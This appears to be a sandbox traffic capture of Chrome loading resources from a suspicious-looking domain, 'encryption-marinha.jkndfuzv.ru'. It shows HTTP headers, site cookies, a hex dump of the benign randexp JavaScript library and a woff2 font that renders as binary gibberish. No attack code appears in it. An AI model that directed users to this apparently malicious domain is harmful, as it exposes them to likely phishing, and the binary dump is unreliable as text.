                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Sec-Fetch-Storage-Access: active
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:31:00 UTC849INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 10245
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                                  ETag: "0x8D9B9A009499A1E"
                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                  x-ms-request-id: d91f6eaf-e01e-0032-2f18-13e122000000
                                                                  x-ms-version: 2023-11-03
                                                                  x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                                  x-ms-blob-content-md5: bCCivoupALwKcRiJOisQcg==
                                                                  x-ms-lease-status: unlocked
                                                                  x-ms-lease-state: available
                                                                  x-ms-blob-type: BlockBlob
                                                                  Content-Disposition: attachment; filename=randexp.min.js
                                                                  x-ms-server-encrypted: true
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Fastly-Restarts: 1
                                                                  Accept-Ranges: bytes
                                                                  Age: 3467
                                                                  Date: Fri, 14 Mar 2025 11:31:00 GMT
                                                                  X-Served-By: cache-iad-kiad7000045-IAD, cache-ewr-kewr1740069-EWR
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 35879, 0
                                                                  X-Timer: S1741951861.811792,VS0,VE0
                                                                  2025-03-14 11:31:00 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                                  Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                                  2025-03-14 11:31:00 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                                  Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                                  2025-03-14 11:31:00 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                                  Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                                  2025-03-14 11:31:00 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                                  Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                                                  2025-03-14 11:31:00 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                                                  Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                                  2025-03-14 11:31:00 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                                  Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                                  2025-03-14 11:31:00 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                                  Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                                  2025-03-14 11:31:00 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                                  Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.449753104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:00 UTC1410OUTGET /GDSherpa-vf.woff2 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: font
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:01 UTC1156INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:01 GMT
                                                                  Content-Type: font/woff2
                                                                  Content-Length: 43596
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="GDSherpa-vf.woff2"
                                                                  Last-Modified: Fri, 14 Mar 2025 11:31:01 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnIz6XKAQnixrMhQkDfNVm3%2Fi7u90PguCi79tzrFhZNCO%2FIrquhZ1SkAq34s%2Fp7VyX0MLmBvuYcNe%2FlW7zVx0fFHH92HT2RX4P8kg2wVm6eGKDZh0cZ%2FG%2BK7GjfO"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5454&min_rtt=5426&rtt_var=1542&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2319&delivery_rate=521707&cwnd=246&unsent_bytes=0&cid=bbab88ffc68c1106&ts=209&x=0"
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: MISS
                                                                  Accept-Ranges: bytes
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203713a986fc443-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1453&rtt_var=552&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1982&delivery_rate=1967654&cwnd=215&unsent_bytes=0&cid=7ac33bf55ad87d02&ts=687&x=0"
                                                                  2025-03-14 11:31:01 UTC213INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88
                                                                  Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65 62 3c 2c 78 9e 9a 82 8b e1 e3 29 f6 84 63 bf 87 74 85 01 a3 6b 16 0e 86 39 ba 09 6f 1e 54 89 f1 52 39 d1 f2 8a 9e 6b 71 93 de 54 52 25 55 f2 d4 76 a3 f6 f9 a5 72 13 5f 92 92 e2 c3 0a 13 44 ba fc 14 66 b2 84 3d 71 48 da a1 bc c4 38 df 90 3c af 1d 07 78 08 c2 28 56 98 49 b2 68 94 4c 33 2a 23 5d 38 89 e2 09 2d 94 7a 94 9c df 03 ae e5 f7 8f 17 33 91 39 56 c4 93 99 be b4 14 f9 8b 98 1e c3 96 75 bf 15 1a a7 e4 0e ea f3 ed 78 b2 b6 f2 cb fa 53 5f ea 1d ff 5c 31 f0 f2 8c ca 26 36 ed e1 bc bc ff 6a 5e da 03 c4 63 3b 28 29 6d c4 4a 9d f5 c4 17 02 3e af fa aa 97 78 7a b0 ea 59 a2 bf ed 7c c8 37 9e 00 9c e8 05 95 21 9c 6a 77 02 b6 80 2c c9 b6
                                                                  Data Ascii: m/>8&f&]u&VD]<yReb<,x)ctk9oTR9kqTR%Uvr_Df=qH8<x(VIhL3*#]8-z39VuxS_\1&6j^c;()mJ>xzY|7!jw,
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: d9 0e 44 66 41 90 c1 c0 1f 61 26 59 35 9d ce fc 85 47 48 9c dc 58 77 25 09 a5 15 5f 9a 11 1f 54 24 c2 22 11 1e 1e ec 77 dd f6 24 8a 23 a4 3e ee be f6 9b 95 04 2c 60 ba e4 bf 52 71 1e dd 2a 54 ea 34 59 ab a2 82 d2 3a 27 10 31 3a 48 2b 34 e8 5e c7 7b bf 7b c8 65 ff 42 cf bd bd ab ef b8 b2 97 ef 69 4a a4 41 10 31 c6 50 bb 1f be 4e e2 cd 9b d1 0b fa 4b 4f a4 c1 39 b1 d6 36 7e db fb f5 cd a9 82 cc dd 47 43 9a 20 e1 12 24 14 22 52 b8 85 38 22 8e a4 7b 76 f7 f3 d9 17 d6 f7 fc fe f9 d7 29 e7 7b 98 f3 bc db 98 3b b6 aa aa a8 aa a8 88 25 a2 ea 3b df 32 94 7c ed 9f f6 6c ef 21 73 f4 4a bb bb 26 84 c1 18 21 1e e6 21 84 0f 9b 2b 82 1a 77 af 35 6c 48 69 09 35 4a 24 75 82 dc 7e f1 b2 cd 6a 29 3d 11 8f 92 dd 10 05 7f bc 6f 86 94 ab 21 28 0f 87 be 27 08 80 be f0 01 b4 00
                                                                  Data Ascii: DfAa&Y5GHXw%_T$"w$#>,`Rq*T4Y:'1:H+4^{{eBiJA1PNKO96~GC $"R8"{v){;%;2|l!sJ&!!+w5lHi5J$u~j)=o!('
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 30 01 c5 7f 4b d3 80 08 2e 94 c2 60 c4 f5 1e c7 c1 b8 85 e0 63 f2 fc 21 17 35 5f a4 a7 ad c0 72 cd f9 6e a8 6d 5e 74 02 56 69 66 63 5b 99 97 7c 2c fd 27 61 c8 ae 40 18 e6 df aa 18 25 6e 94 42 80 07 20 2d 08 b1 93 c5 85 92 ca 74 24 c9 29 cb 80 39 2f 50 9a 2f 68 40 1a 7d 11 88 e5 e3 a4 75 80 dc c4 20 d0 83 46 5b 06 ed d9 92 51 34 05 42 e1 1d 06 d4 cc 4f a7 f3 a8 86 14 ca 37 c2 01 b0 1d 64 67 70 c8 e6 3d 82 39 11 ef 09 cd e3 90 81 38 bc 6e d5 36 b0 30 b7 3e 73 33 bc 8a 90 c1 04 4a dc 88 5d 38 67 02 e8 f9 c8 ee e9 ce ef 51 a3 39 c0 26 c4 d8 a7 93 2b e3 36 6f b5 c5 68 7d 8c 94 c3 4b e0 ec cc 9d d2 67 95 c6 4a 2e 43 fd 67 14 df 88 78 3e 8e cb 57 e9 89 c3 1f 96 b3 87 8b 11 33 06 11 34 6b 22 26 55 c5 d6 a2 ea 59 69 82 11 80 6c b8 40 0c 1a 2b 21 c0 34 cb 4f c3 5e
                                                                  Data Ascii: 0K.`c!5_rnm^tVifc[|,'a@%nB -t$)9/P/h@}u F[Q4BO7dgp=98n60>s3J]8gQ9&+6oh}KgJ.Cgx>W34k"&UYil@+!4O^
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: e2 8f ce 7f 13 bb a1 3d 21 b6 2b 7d ac 76 c8 d7 02 73 06 b5 db d0 49 22 32 49 bf 10 bc a0 d8 9c 34 99 2c 33 d6 72 e1 d2 df 5e 42 a9 8e 7b bd 96 31 a6 4d de a7 62 9b cc 63 9d c6 f1 2f 34 7d 54 e7 b4 4d c7 fa 6c 99 5d 33 da 4c 77 c2 3a 92 a4 64 ed 0b e8 55 62 22 33 fc bb a8 df cf da 1f 54 fe 3f df c2 9f fa 55 eb f3 2f fb 3f 6b 42 80 e6 dc c4 5f d1 c9 e3 66 b4 c7 ea be 1d ac ee 83 8e 1b 6e 8e ad e6 bf 68 8b 30 29 a2 ef ac 6e fe 44 d0 f2 a5 17 56 22 31 26 d0 d2 6d a3 bb 17 9d 73 39 f5 89 d5 38 e0 ef 35 50 6a bd d3 68 98 1c 7f 67 c2 aa e8 a1 96 8b d8 a4 bd 9e 7c 39 3f 4f c8 a7 12 23 ec ed 11 e2 58 6c 9b 9a a1 7a 4c a7 11 3d 93 cb 1a 4c d6 56 ca 7b d7 cc 70 24 8f 19 f8 91 9b ae b0 2b 74 9c 0d c7 6e 45 bd ad 63 20 b9 63 fa 91 b3 d4 3e 10 b3 8c 0f 08 47 58 59 8d
                                                                  Data Ascii: =!+}vsI"2I4,3r^B{1Mbc/4}TMl]3Lw:dUb"3T?U/?kB_fnh0)nDV"1&ms985Pjhg|9?O#XlzL=LV{p$+tnEc c>GXY
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 13 74 8d a8 cd c7 ac 4b bc db 69 e7 25 31 fc e9 40 8d 94 e5 4d f5 ad 81 68 83 eb e8 05 23 03 df f5 fe 06 36 b5 c7 3a 22 04 d7 4e b9 cf d6 7e 51 66 42 4f af b5 64 c4 77 d5 ac 8b 72 c5 c6 e8 da 2f 45 53 1b 5e 36 bf b9 57 f3 0c 9b a7 79 98 43 e9 85 ab 31 07 50 d2 b9 fc f2 4c 58 6f d0 0e 04 fe 5e 10 f2 a5 62 4a 03 ae f5 23 0e a0 dc 11 5f 81 1e 73 b5 7b 39 53 f6 0e a9 9c 61 b4 08 19 a0 37 a3 b3 d1 64 42 58 af 6d b4 58 b0 25 ed e0 2e 67 1a 38 ca 4f ab 6d c5 9d 35 42 5e 54 6b 53 6a da 0c 6e 36 4d af b5 37 f9 5c b6 40 5b 76 29 54 f2 59 8f 3d f3 a5 86 3a 75 01 84 29 72 e0 63 68 d6 c8 ba 8a 3f d4 d9 56 7c 70 6c 59 66 f4 6d 5c cc 9e a2 13 3d b5 d1 e2 c1 14 a1 a4 bd 58 c0 cd f9 49 38 5d 1b e0 c7 3e 80 db 57 d8 d0 f7 34 d5 e9 e3 ff a0 96 2a 2e ee aa 1c c5 9e 8d 4c 4a
                                                                  Data Ascii: tKi%1@Mh#6:"N~QfBOdwr/ES^6WyC1PLXo^bJ#_s{9Sa7dBXmX%.g8Om5B^TkSjn6M7\@[v)TY=:u)rch?V|plYfm\=XI8]>W4*.LJ
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: ff 72 06 c6 c0 fa ed 9c 1c 7d f4 0c d2 d3 70 bc 97 db 6f b1 25 df 73 6b 4b 9b 6f 58 85 19 04 fb ee 8a f8 5e bf d7 b7 51 00 f1 b3 57 23 59 2e 77 0d f4 d4 fc 07 b6 eb 05 61 4b 8f 5a 69 5f 3f 47 81 2d dd 92 6b bd 6b 22 2b 98 d4 8f e4 e9 b1 30 e8 a1 ef f4 f7 86 b3 0e 29 d8 19 de e0 eb f9 a7 c6 a9 6c 9d 52 a2 a4 d8 95 ec 1d d9 5a e9 cf 87 7a 12 ff cf f2 c9 76 7e e8 a4 ba b1 b6 d1 ee e0 7a 6f e0 85 92 f6 20 63 59 69 56 e6 b3 2a dd e1 fb 92 29 89 1f d5 9b 49 97 d7 9b e9 9f a6 2b 09 6d e5 0d 86 58 5d fc e5 38 51 16 3b ad f1 91 74 dc 2c 3d 43 ce b0 07 c9 31 8e e0 3d 9f d5 dd 53 e1 45 a4 70 60 88 7d f4 f0 c9 ce e9 3c 80 df d7 78 30 94 d8 36 05 db e0 5a 22 20 14 60 19 dd f7 b3 b4 bd 5f 75 e5 6b a0 e7 ef 7e 7d d8 73 30 10 2c 3f 4a 0d df 7f 51 a7 a1 85 fe 76 4e 9d 30
                                                                  Data Ascii: r}po%skKoX^QW#Y.waKZi_?G-kk"+0)lRZzv~zo cYiV*)I+mX]8Q;t,=C1=SEp`}<x06Z" `_uk~}s0,?JQvN0
